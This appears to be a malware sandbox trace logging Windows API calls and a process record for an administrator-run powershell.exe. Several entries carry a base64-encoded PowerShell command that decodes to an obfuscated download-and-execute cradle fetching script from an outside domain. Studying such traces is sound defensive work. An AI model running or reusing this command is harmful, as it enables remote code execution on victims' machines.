	[0438.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.465] SetErrorMode (uMode=0x1) returned 0x1
	[0438.465] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.466] SetErrorMode (uMode=0x1) returned 0x1
	[0438.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.466] SetErrorMode (uMode=0x1) returned 0x1
	[0438.466] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.466] SetErrorMode (uMode=0x1) returned 0x1
	[0438.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.466] SetErrorMode (uMode=0x1) returned 0x1
	[0438.467] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.467] SetErrorMode (uMode=0x1) returned 0x1
	[0438.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.467] SetErrorMode (uMode=0x1) returned 0x1
	[0438.467] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.467] SetErrorMode (uMode=0x1) returned 0x1
	[0438.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0438.468] SetErrorMode (uMode=0x1) returned 0x1
	[0438.468] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2aa080
	[0438.469] FindNextFileW (in: hFindFile=0x2aa080, lpFindFileData=0x1c6ee030 | out: lpFindFileData=0x1c6ee030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0438.469] FindClose (in: hFindFile=0x2aa080 | out: hFindFile=0x2aa080) returned 1
	[0438.469] SetErrorMode (uMode=0x1) returned 0x1
	[0438.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0438.470] SetErrorMode (uMode=0x1) returned 0x1
	[0438.470] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6ee350 | out: lpFileInformation=0x1c6ee350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0438.470] SetErrorMode (uMode=0x1) returned 0x1
	[0438.471] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.471] CoTaskMemFree (pv=0x290b70) 
	[0438.785] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.785] CoTaskMemFree (pv=0x290b70) 
	[0438.789] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.789] CoTaskMemFree (pv=0x290b70) 
	[0438.798] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.798] CoTaskMemFree (pv=0x290b70) 
	[0438.811] CoTaskMemAlloc (cb=0x3b) returned 0x1ed160
	[0438.811] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6ee538, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6ee538) returned 0x4550
	[0438.812] CoTaskMemFree (pv=0x1ed160) 
	[0438.815] GetConsoleWindow () returned 0x10344
	[0438.822] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0438.822] CoTaskMemFree (pv=0x290b70) 
	[0438.823] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0438.824] CoTaskMemFree (pv=0x290b70) 
	[0438.829] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0438.829] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0438.829] CoTaskMemFree (pv=0x290b70) 
	[0439.159] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c6ee580 | out: pNumArgs=0x1c6ee580) returned 0x1b37d810*=""
	[0439.161] lstrlenW (lpString="-EncodedCommand") returned 15
	[0439.162] CoTaskMemAlloc (cb=0x22) returned 0x1b35c310
	[0439.162] RtlMoveMemory (in: Destination=0x1b35c310, Source=0x1b37d832, Length=0x20 | out: Destination=0x1b35c310) 
	[0439.162] CoTaskMemFree (pv=0x1b35c310) 
	[0439.162] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0439.162] CoTaskMemAlloc (cb=0x2f4) returned 0x1b37db50
	[0439.162] RtlMoveMemory (in: Destination=0x1b37db50, Source=0x1b37d852, Length=0x2f2 | out: Destination=0x1b37db50) 
	[0439.162] CoTaskMemFree (pv=0x1b37db50) 
	[0439.163] LocalFree (hMem=0x1b37d810) returned 0x0
	[0439.163] CoTaskMemAlloc (cb=0x804) returned 0x1b37d810
	[0439.163] GetConsoleTitleW (in: lpConsoleTitle=0x1b37d810, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0439.164] CoTaskMemFree (pv=0x1b37d810) 
	[0439.173] CoTaskMemAlloc (cb=0x38e) returned 0x1b37d810
	[0439.173] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c6ee4e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3045978 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x3045978*(hProcess=0x368, hThread=0x364, dwProcessId=0x1668, dwThreadId=0x166c)) returned 1
	[0439.176] CoTaskMemFree (pv=0x1b37d810) 
	[0439.177] CloseHandle (hObject=0x364) returned 1
	[0439.177] CoTaskMemAlloc (cb=0x3b) returned 0x1ed160
	[0439.177] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6ee588, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6ee588) returned 0x4550
	[0439.178] CoTaskMemFree (pv=0x1ed160) 
	[0439.181] GetCurrentProcess () returned 0xffffffffffffffff
	[0439.181] GetCurrentProcess () returned 0xffffffffffffffff
	[0439.182] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ee668, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ee668*=0x364) returned 1

Process:
	id = "39"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x263a000"
	os_pid = "0xc60"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 221
	os_tid = 0xc64

	[0423.438] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0425.002] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0425.003] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0425.003] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0425.003] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0427.156] GetVersionExW (in: lpVersionInformation=0x12de60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12de60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0427.158] GetVersionExW (in: lpVersionInformation=0x12de60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12de60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0427.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.400] GetVersionExW (in: lpVersionInformation=0x12dbd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dbd0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0427.401] SetErrorMode (uMode=0x1) returned 0x1
	[0427.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dd30 | out: lpFileInformation=0x12dd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0427.402] SetErrorMode (uMode=0x1) returned 0x1
	[0427.406] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dfa0 | out: lpdwHandle=0x12dfa0) returned 0x94c
	[0427.407] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c672d8 | out: lpData=0x2c672d8) returned 1
	[0427.410] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2c67374, puLen=0x12df10) returned 1
	[0427.412] lstrlenW (lpString="䅁") returned 1
	[0427.421] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c67450, puLen=0x12de80) returned 1
	[0427.422] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0427.424] CoTaskMemAlloc (cb=0x2e) returned 0x3949f0
	[0427.424] lstrcpyW (in: lpString1=0x3949f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0427.425] CoTaskMemFree (pv=0x3949f0) 
	[0427.425] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c674a4, puLen=0x12de80) returned 1
	[0427.425] lstrlenW (lpString="System.Management.Automation") returned 28
	[0427.425] CoTaskMemAlloc (cb=0x3c) returned 0x2c9860
	[0427.425] lstrcpyW (in: lpString1=0x2c9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0427.425] CoTaskMemFree (pv=0x2c9860) 
	[0427.425] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c67500, puLen=0x12de80) returned 1
	[0427.425] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0427.425] CoTaskMemAlloc (cb=0x20) returned 0x394f30
	[0427.425] lstrcpyW (in: lpString1=0x394f30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0427.425] CoTaskMemFree (pv=0x394f30) 
	[0427.425] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c67540, puLen=0x12de80) returned 1
	[0427.425] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0427.425] CoTaskMemAlloc (cb=0x44) returned 0x2c9860
	[0427.426] lstrcpyW (in: lpString1=0x2c9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0427.426] CoTaskMemFree (pv=0x2c9860) 
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c675a8, puLen=0x12de80) returned 1
	[0427.426] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0427.426] CoTaskMemAlloc (cb=0x76) returned 0x33e8b0
	[0427.426] lstrcpyW (in: lpString1=0x33e8b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0427.426] CoTaskMemFree (pv=0x33e8b0) 
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c67644, puLen=0x12de80) returned 1
	[0427.426] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0427.426] CoTaskMemAlloc (cb=0x44) returned 0x2c9860
	[0427.426] lstrcpyW (in: lpString1=0x2c9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0427.426] CoTaskMemFree (pv=0x2c9860) 
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c676a8, puLen=0x12de80) returned 1
	[0427.426] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0427.426] CoTaskMemAlloc (cb=0x58) returned 0x2e5fa0
	[0427.426] lstrcpyW (in: lpString1=0x2e5fa0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0427.426] CoTaskMemFree (pv=0x2e5fa0) 
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c67724, puLen=0x12de80) returned 1
	[0427.426] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0427.426] CoTaskMemAlloc (cb=0x20) returned 0x394f30
	[0427.426] lstrcpyW (in: lpString1=0x394f30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0427.426] CoTaskMemFree (pv=0x394f30) 
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2c673cc, puLen=0x12de80) returned 1
	[0427.426] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0427.426] CoTaskMemAlloc (cb=0x66) returned 0x30c1a0
	[0427.426] lstrcpyW (in: lpString1=0x30c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0427.426] CoTaskMemFree (pv=0x30c1a0) 
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x0, puLen=0x12de80) returned 0
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x0, puLen=0x12de80) returned 0
	[0427.426] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x0, puLen=0x12de80) returned 0
	[0427.427] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12de58, puLen=0x12de50 | out: lplpBuffer=0x12de58*=0x2c67374, puLen=0x12de50) returned 1
	[0427.428] CoTaskMemAlloc (cb=0x204) returned 0x334a10
	[0427.428] VerLanguageNameW (in: wLang=0x0, szLang=0x334a10, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0427.429] CoTaskMemFree (pv=0x334a10) 
	[0427.429] VerQueryValueW (in: pBlock=0x2c672d8, lpSubBlock="\\", lplpBuffer=0x12dea8, puLen=0x12dea0 | out: lplpBuffer=0x12dea8*=0x2c67300, puLen=0x12dea0) returned 1
